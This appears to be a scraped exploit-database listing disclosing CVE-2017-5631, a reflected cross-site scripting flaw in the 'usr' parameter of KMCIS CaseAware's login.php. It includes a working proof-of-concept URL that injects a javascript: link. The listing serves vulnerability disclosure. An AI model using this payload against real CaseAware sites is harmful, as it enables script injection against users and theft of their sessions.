Lucene search

K
zdtJustpentest1337DAY-ID-27814
HistoryMay 21, 2017 - 12:00 a.m.

KMCIS CaseAware - Cross-Site Scripting Vulnerability

2017-05-2100:00:00
justpentest
0day.today
31

0.003 Low

EPSS

Percentile

68.9%

Exploit for php platform in category web applications

# Exploit Title: CaseAware Cross Site Scripting Vulnerability
# Date: 20th May 2017
# Exploit Author: justpentest
# Vendor Homepage: https://caseaware.com/
# Version: All the versions
# Contact: [emailΒ protected]
# CVE : 2017-5631
 
Source: https://nvd.nist.gov/vuln/detail/CVE-2017-5631#vulnDescriptionTitle
 
1) Description:
An issue with respect to input sanitization was discovered in KMCIS
CaseAware. Reflected cross site scripting is present in the user parameter
(i.e., "usr") that is transmitted in the login.php query string. So
bascially username parameter is vulnerable to XSS.
 
2) Exploit:
 
https://caseaware.abc.com:4322/login.php?mid=0&usr=admin'><a
HREF="javascript:alert('OPENBUGBOUNTY')">Click_ME<'
----------------------------------------------------------------------------------------
 
3) References:
 
https://www.openbugbounty.org/incidents/228262/
https://nvd.nist.gov/vuln/detail/CVE-2017-5631#vulnDescriptionTitle

#  0day.today [2018-03-03]  #

0.003 Low

EPSS

Percentile

68.9%